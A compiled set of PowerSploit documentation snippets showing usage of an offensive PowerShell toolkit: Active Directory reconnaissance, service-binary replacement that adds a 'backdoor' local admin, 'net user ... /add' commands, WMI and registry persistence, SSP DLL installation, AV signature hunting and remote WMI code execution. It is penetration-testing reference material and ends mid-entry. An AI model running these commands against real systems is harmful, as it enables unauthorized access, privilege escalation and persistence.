### Get Shares for All Domain Computers

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetShare.md

This example retrieves shares from all computers in the current domain by piping the output of Get-DomainComputer to Get-NetShare.

```powershell
Get-DomainComputer | Get-NetShare
```

--------------------------------

### Get Logged On Users with Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetLoggedon.md

Use this example to connect to a remote host using specified credentials. Ensure the password is kept secure.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
```

--------------------------------

### Example 1: Basic Usage

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainTrustMapping.md

This entry is meant to show the basic usage of the Get-DomainTrustMapping cmdlet, but the upstream document still carries its template placeholder instead of an example.

```powershell
PS C:\> {{ Add example code here }}
```

--------------------------------

### Install SSP DLL

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/Install-SSP.md

Use this command to install an SSP DLL. Ensure the DLL architecture matches the OS architecture and that it exports the SpLsaModeInitialize function.

```powershell
Install-SSP -Path .\mimilib.dll
```

--------------------------------

### Get Foreign Users with Alternate Credentials and Server Binding

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainForeignUser.md

This example queries foreign users in 'dev.testlab.local' while binding to a specific domain controller ('secondary.dev.testlab.local') and using alternate credentials. The credentials must be created using a secure string for the password.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
```

--------------------------------

### Get Forest Global Catalogs with Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-ForestGlobalCatalog.md

This example queries for global catalog servers using alternate credentials. It first converts a plain-text password to a secure string, then creates a PSCredential object before calling the cmdlet.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-ForestGlobalCatalog -Credential $Cred
```

--------------------------------

### Get Users by Multiple Identities and Specific Properties

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainUser.md

This example retrieves users by a mix of SIDs, distinguished names, GUIDs, and usernames, returning only the 'samaccountname' and 'lastlogoff' properties.

```powershell
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
```

--------------------------------

### Invoke-RevertToSelf Example

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Invoke-RevertToSelf.md

This example shows how to use Invoke-RevertToSelf after impersonating a user with Invoke-UserImpersonation. It first converts a plain-text password to a secure string, creates a PSCredential object, impersonates the user to obtain a token, and then reverts the impersonation, closing the token handle.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
$Token = Invoke-UserImpersonation -Credential $Cred
Invoke-RevertToSelf -TokenHandle $Token
```

--------------------------------

### Get Domain Policy with Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainPolicy.md

This example uses alternate credentials to retrieve the domain policy. First a secure-string password is created, then a PSCredential object is instantiated, and finally Get-DomainPolicy is called with the -Credential parameter.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainPolicy -Credential $Cred
```

--------------------------------

### Get Domain Controllers via Pipeline Input

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainController.md

This example pipes a domain name directly to Get-DomainController to determine that domain's domain controllers.

```powershell
'test.local' | Get-DomainController
```

--------------------------------

### Get Domains Using Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-ForestDomain.md

This example queries a forest using alternate credentials. It first converts a plain-text password to a secure string and then creates a PSCredential object before calling Get-ForestDomain.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-ForestDomain -Credential $Cred
```

--------------------------------

### Install and Import PowerSploit Module

Source: https://context7.com/powershellmafia/powersploit/llms.txt

Instructions for installing PowerSploit as a PowerShell module and importing its commands, including unblocking downloaded scripts and viewing help.

```powershell
# Copy to per-user module directory
Copy-Item -Recurse .\PowerSploit "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules\PowerSploit"

# Import the full module
Import-Module PowerSploit

# List all imported commands
Get-Command -Module PowerSploit

# Unblock scripts downloaded from the internet (PowerShell v3+)
$Env:PSModulePath.Split(';') | ForEach-Object {
    if (Test-Path (Join-Path $_ PowerSploit)) {
        Get-ChildItem $_ -Recurse | Unblock-File
    }
}

# View help for any function
Get-Help Get-DomainUser -Full
```

--------------------------------

### Get Domain Computers with Custom Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainComputer.md

Retrieves computer objects using custom credentials. This example first creates a secure string for the password and then a PSCredential object.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainComputer -Credential $Cred
```

--------------------------------

### Find-AVSignature - Basic Usage

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/AntivirusBypass/Find-AVSignature.md

This example shows the basic usage of Find-AVSignature to locate AV signatures within a file. It specifies the start byte, end byte, interval, and the path to the target executable.

```powershell
Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
```

--------------------------------

### Return All Objects for a Specific Domain

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md

This example retrieves all objects from the 'testlab.local' domain.

```powershell
Get-DomainObject -Domain testlab.local
```

--------------------------------

### Enumerate ACLs for All OUs

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObjectAcl.md

This example pipes the output of Get-DomainOU into Get-DomainObjectAcl to enumerate ACL permissions for all Organizational Units in the domain. The -ResolveGUIDs switch displays GUIDs as names.

```powershell
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
```

--------------------------------

### Find Unattended Install Files

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Get-UnattendedInstallFile.md

Execute this command to search for any remaining unattended installation files on the system.

```powershell
Get-UnattendedInstallFile
```

--------------------------------

### Get All Security Groups with Managers and Export to CSV

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainManagedSecurityGroup.md

This example retrieves all security groups that have a manager assigned and exports the results to a CSV file named 'group-managers.csv'. Ensure the Export-PowerViewCSV cmdlet is available.

```powershell
Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv
```

--------------------------------

### Add-DomainObjectAcl Example

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Add-DomainObjectAcl.md

This example grants the 'ResetPassword' right to the 'harmj0y' principal on the 'testuser' object using alternate credentials.

**Description:** Grants specified rights to a principal on a domain object.

**Parameters**

- **-TargetIdentity** (String[], required): A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) for the domain object to modify ACLs for. Wildcards accepted.
- **-TargetDomain** (String, optional): The domain of the TargetIdentity to use for the modification; defaults to the current domain.
- **-TargetLDAPFilter** (String, optional): An LDAP query string used to filter Active Directory object targets.
- **-TargetSearchBase** (String, optional): The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- **-PrincipalIdentity** (String[], required): A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) for the domain principal to add to the ACL. Wildcards accepted.
- **-PrincipalDomain** (String, optional): The domain of the principal; defaults to the current domain.
- **-Rights** (String[], required): The rights to grant to the principal on the target object. Common rights include 'ReadPassword', 'ResetPassword', 'GenericAll', etc.
- **-Credential** (PSCredential, optional): Credentials to use when connecting to the domain controller.

**Example**

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
```

**Output:** The cmdlet does not return a value on success; with -Verbose it reports the ACL modification:

```
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
```

--------------------------------

### Get Computer Information as Objects

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-ComputerDetail.md

Use this command to retrieve detailed computer information, output as PowerShell objects for further manipulation.

```powershell
Get-ComputerDetail
```

--------------------------------

### Install-ServiceBinary - Pipe Service Object for Binary Replacement

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md

This example pipes a service object to Install-ServiceBinary to replace its binary. By default it adds a local administrator.

```powershell
Get-Service VulnSVC | Install-ServiceBinary
```

--------------------------------

### Get GPOs by Identity (GUID or Name)

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPO.md

Retrieves GPOs by their GUID or display name, allowing targeted retrieval of specific policy objects.

```powershell
"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
```

--------------------------------

### Get Sites Linked to a Specific GPO

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainSite.md

Returns all sites that are linked to the specified Group Policy Object GUID.

```powershell
Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
```

--------------------------------

### Invoke-ReverseDnsLookup with Piped Input

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Invoke-ReverseDnsLookup.md

This example pipes a string containing IP addresses and CIDR ranges to Invoke-ReverseDnsLookup for processing.

```powershell
Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup
```

--------------------------------

### Get Domain Group Members

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGroupMember.md

Retrieves members of the 'Desktop Admins' group in the current domain. This is a basic usage example.

```powershell
Get-DomainGroupMember "Desktop Admins"
```

--------------------------------

### New-ElevatedPersistenceOption -PermanentWMI -AtStartup

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/New-ElevatedPersistenceOption.md

Configures persistence via a permanent WMI event subscription that triggers at system startup. This option is difficult to detect and remove.

**Switch parameters**

- **-PermanentWMI**: Persist via a permanent WMI event subscription.
- **-AtStartup**: Starts the payload within 240 and 325 seconds of computer startup.

**Example**

```powershell
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -AtStartup
```

--------------------------------

### Get ACLs for a Local File via Pipeline

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-PathAcl.md

This example pipes a file object obtained from Get-ChildItem (alias gci) to Get-PathAcl to retrieve its ACLs.

```powershell
gci .\test.txt | Get-PathAcl
```

--------------------------------

### Find Interesting Domain ACLs with Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Find-InterestingDomainAcl.md

Shows how to use custom credentials to run Find-InterestingDomainAcl against a domain, including resolving GUIDs.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs
```

--------------------------------

### Get RDP Sessions on Domain Controllers

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetRDPSession.md

This example retrieves active RDP/terminal sessions on all domain controllers by piping the output of Get-DomainController to Get-NetRDPSession.

```powershell
Get-DomainController | Get-NetRDPSession
```

--------------------------------

### Install-ServiceBinary - Execute Custom Command

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md

Replaces a service's binary with one that executes a specified custom command instead of creating a user. The original binary is backed up.

```powershell
Install-ServiceBinary -Name VulnSVC -Command "net ..."
```

--------------------------------

### Convert SID with Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/ConvertFrom-SID.md

This example converts a SID using alternate credentials. A secure string for the password is created, then a PSCredential object is instantiated and passed to ConvertFrom-SID.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred
```

--------------------------------

### New-UserPersistenceOption - Registry - AtLogon

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/New-UserPersistenceOption.md

Configures persistence via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, executing upon user logon. Note: this option will briefly pop up a PowerShell console to the user.

**Example**

```powershell
New-UserPersistenceOption -Registry -AtLogon
```

**Output:** Returns an object representing the configured persistence option, for example:

```json
{
  "PersistenceOption": "Registry",
  "AtLogon": true
}
```

--------------------------------

### Get GPO-Set Local Groups by GPO Identity

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPOLocalGroup.md

Retrieves GPO-set groups for a specific GPO identified by its GUID. The GPO identity can be piped to the cmdlet.

```powershell
'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
```

--------------------------------

### Get-WMIRegProxy

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-WMIRegProxy.md

Enumerates the proxy server and WPAD specification for the current user on the local machine.

**Example**

```powershell
Get-WMIRegProxy
```

**Output:** Custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents, for example:

```json
[
  {
    "ComputerName": "WINDOWS1",
    "ProxyServer": "http://primary.test...",
    "AutoConfigURL": null,
    "Wpad": null
  }
]
```

--------------------------------

### Get MS SQL Servers in a Specific Domain

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainComputer.md

Retrieves computer objects in the 'testlab.local' domain that have a service principal name starting with 'mssql*'.

```powershell
Get-DomainComputer -SPN mssql* -Domain testlab.local
```

--------------------------------

### Get GPOs with Custom LDAP Filter

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPO.md

Uses a custom LDAP filter to retrieve GPOs. This example, as given in the upstream document, filters on primarygroupid not equal to 513 and requests the samaccountname and lastlogon properties.

```powershell
Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
```

--------------------------------

### Get-NetComputerSiteName - With Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetComputerSiteName.md

This example uses alternate credentials to retrieve the AD site for a remote computer. Ensure the credentials are valid and have the necessary permissions.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
```

--------------------------------

### Install-ServiceBinary - Replace Service Binary with Default Administrator Creation

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md

Use this cmdlet to replace a service's binary with one that adds a default local administrator user. The original binary is backed up.

```powershell
Install-ServiceBinary -Name VulnSVC
```

--------------------------------

### Get GPO-Set Local Groups with Custom Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPOLocalGroup.md

Retrieves GPO-set local groups using specified credentials. This example first creates a secure string for the password and then a PSCredential object.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGPOLocalGroup -Credential $Cred
```

--------------------------------

### Restore Service Binary via Pipeline

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Restore-ServiceBinary.md

This example pipes a service object to Restore-ServiceBinary to restore its original binary. This is useful when you already have the service object.

```powershell
Get-Service VulnSVC | Restore-ServiceBinary
```

--------------------------------

### Authenticate with Custom Credentials and Retrieve Object

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md

This example authenticates to Active Directory using custom credentials and then retrieves a specific domain object by its identity.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainObject -Credential $Cred -Identity 'windows1'
```

--------------------------------

### Execute a Simple ScriptBlock on a Remote Host

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/CodeExecution/Invoke-WmiCommand.md

This example executes a basic ScriptBlock on a remote computer using specified credentials. Ensure the provided credentials have the necessary permissions on the target machine.

```powershell
Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1'
```

--------------------------------

### Retrieve Specific Properties for Piped Identities

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md

This example retrieves the 'distinguishedname' property for a list of identities provided via the pipeline. The identities can be in various formats: SID, DistinguishedName, GUID, or SamAccountName.

```powershell
'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname
```

--------------------------------

### Test Admin Access with Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Test-AdminAccess.md

This example tests admin access on a remote machine using alternate credentials. Ensure the password is kept secure.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Test-AdminAccess -ComputerName sqlserver -Credential $Cred
```

--------------------------------

### Get ACLs for a Specific User

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObjectAcl.md

Use this snippet to retrieve ACLs for a user by SAM account name in a specified domain. The -ResolveGUIDs parameter translates relevant GUIDs into human-readable display names.

```powershell
Get-DomainObjectAcl -Identity matt.admin -Domain testlab.local -ResolveGUIDs
```

--------------------------------

### Execute Get-DomainGPOUserLocalGroupMapping with Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md

This example runs Get-DomainGPOUserLocalGroupMapping using specific credentials. It first converts a plain-text password to a secure string and then creates a PSCredential object for authentication.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGPOUserLocalGroupMapping -Credential $Cred
```

--------------------------------

### Install-ServiceBinary - Specify User and Password for Local Group Addition

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md

Replaces a service's binary and specifies both a custom username and password for the new local administrator account. The user is added to the default 'Administrators' group.

```powershell
Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
```

--------------------------------

### Configure Registry Persistence at Startup

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/New-ElevatedPersistenceOption.md

Use this to configure persistence via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, triggering at user logon. Note that this option will briefly display a PowerShell console.

```powershell
New-ElevatedPersistenceOption -Registry -AtStartup
```

--------------------------------

### Set Service Binary Path by Name

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Set-ServiceBinaryPath.md

This example sets the binary path for a service named 'VulnSvc' to a command that adds a user. It requires the service name and the desired command as the new path.

```powershell
Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'
```

--------------------------------

### Get Domain Group from a Different Domain Using Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGroup.md

Retrieves the 'Domain Admins' group from a different domain ('DEV') with verbose output showing the search process. This illustrates querying groups across trusted domains or different forest structures.

```powershell
'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname
```

--------------------------------

### Get-WMIRegProxy with Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-WMIRegProxy.md

Enumerates the proxy server and WPAD specification for the current user on a remote machine specified with -ComputerName, using alternate credentials.

**Parameters**

- **-ComputerName**: The system to enumerate proxy settings on. Defaults to the local host.
- **-Credential**: A [Management.Automation.PSCredential] object of alternate credentials for connecting to the remote system.

**Example**

```powershell
$Cred = Get-Credential "TESTLAB\administrator"
Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
```

**Output:** Custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents, for example:

```json
[
  {
    "ComputerName": "windows1.testlab.local",
    "ProxyServer": "primary.testlab.local",
    "AutoConfigURL": null,
    "Wpad": null
  }
]
```

--------------------------------

### Get User SID and then Add Domain Object ACL

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Add-DomainObjectAcl.md

This example first retrieves the Security Identifier (SID) for a specified user and uses it to filter the ACLs of a target object. It then adds the 'ResetPassword' right on the target object for the specified principal, and finally re-queries the ACL to confirm the change. Use -Verbose to see the granting process.

```powershell
$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
```

```powershell
Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
```

```powershell
Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
```

--------------------------------

### Add DACLs for Every Service the Current User Can Read

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Add-ServiceDacl.md

This example adds DACLs to all services the current user has read permissions for, by piping the output of Get-Service to Add-ServiceDacl.

```powershell
Get-Service | Add-ServiceDacl
```

--------------------------------

### Retrieve Objects Based on Domain and Identity with Verbose Output

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md

This example retrieves objects for specific identities within the current domain, with verbose output showing the search strings and filters used. It also shows extracting the domain name from the current environment.

```powershell
Get-Domain | Select-Object -Expand name
'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname
```

--------------------------------

### Get-DomainOU with Custom Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainOU.md

This example uses custom credentials to query Active Directory. It first converts a plain-text password to a secure string and then creates a PSCredential object before calling Get-DomainOU.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainOU -Credential $Cred
```

--------------------------------

### Check HTTP Status Codes with SSL

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-HttpStatus.md

This example uses Get-HttpStatus over an SSL connection to check for the paths listed in a dictionary file on a target web host.

```powershell
Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
```

--------------------------------

### Get Domain Trust (NET Default)

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainTrust.md

Retrieves domain trust information using the default NET method. This is the simplest way to get trust data.

```powershell
Get-DomainTrust
```

--------------------------------

### Install-ServiceBinary - Specify User for Local Group Addition

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md

Replaces a service's binary and specifies a custom username to be added to the local Administrators group. The default password 'Password123!' is used.

```powershell
Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
```

--------------------------------

### Find Interesting Domain ACLs with Domain and GUID Resolution

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Find-InterestingDomainAcl.md

Searches for interesting object ACLs in a specified domain ('dev.testlab.local') and resolves GUIDs to their corresponding display names.

```powershell
Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
```

--------------------------------

### Find Subnets Linked to a Specific Group Policy Object

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainSubnet.md

Returns subnet objects that are linked to the specified Group Policy Object GUID. The -GPLink parameter accepts the GUID of the GPO.

```powershell
Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
```

--------------------------------

### Set Service Binary Path via Pipeline

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Set-ServiceBinaryPath.md

This example pipes a service object (obtained via Get-Service) to Set-ServiceBinaryPath to change its binary path, as an alternative to specifying the service by name.

```powershell
Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'
```

--------------------------------

### Install PowerSploit Module

Source: https://github.com/powershellmafia/powersploit/blob/master/README.md

To install the PowerSploit module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. The following unblocks the module's files in whichever module path contains it:

```powershell
$Env:PSModulePath.Split(';') | ForEach-Object {
    if ( Test-Path (Join-Path $_ "PowerSploit") ) {
        Get-ChildItem $_ -Recurse | Unblock-File
    }
}
```

--------------------------------

### Get Domain Controllers with Alternate Credentials

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainController.md

This snippet sets up alternate credentials and uses them with Get-DomainController to query domain controllers in a different domain or with different permissions. Ensure the password is kept secure.

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainController -Credential $Cred
```

--------------------------------

### Execute a ScriptBlock with Custom Registry Locations

Source: https://github.com/powershellmafia/powersploit/blob/master/docs/CodeExecution/Invoke-WmiCommand.md

This example executes a simple arithmetic ScriptBlock on a remote host, specifying custom registry locations for storing the payload and its results. It also uses a specific administrator credential and enables verbose output.
```powershell Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential '10.10.1.1\Administrator' -Verbose ``` -------------------------------- ### Find OUs linked to a specific Group Policy Object Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainOU.md This command retrieves OUs that are linked to a Group Policy Object identified by its GUID. The -GPLink parameter accepts the GPO's GUID. ```powershell Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" ``` -------------------------------- ### Write User Add MSI Installer Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Write-UserAddMSI.md Generates the UserAdd.msi file in the current directory. This MSI can be used to add a user or group to the system, potentially for privilege escalation. ```powershell Write-UserAddMSI ``` -------------------------------- ### Get Local Sessions Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetSession.md Use this snippet to retrieve active sessions on the local machine. ```powershell Get-NetSession ``` -------------------------------- ### Get Domain SID Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainSID.md Retrieves the SID for the current domain. No additional parameters are required. ```powershell Get-DomainSID ``` -------------------------------- ### Authenticate with Credentials and Get Domain Groups Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGroup.md Demonstrates how to create a secure credential object and use it with Get-DomainGroup to query groups when specific authentication is required. This is useful for running the cmdlet in environments with non-default credentials. 
```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainGroup -Credential $Cred ``` -------------------------------- ### Get Domain by Name Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-Domain.md Use this to retrieve the domain object for a specific domain name. ```powershell Get-Domain -Domain testlab.local ``` -------------------------------- ### Create New Domain User Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/New-DomainUser.md Creates a new domain user with a specified SAM account name, description, and password. ```powershell New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword ``` -------------------------------- ### Get Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Add-RemoteConnection.md Obtain user credentials for authentication. This is a prerequisite for establishing remote connections. ```powershell $Cred = Get-Credential ``` -------------------------------- ### Export Domain User Data to CSV Source: 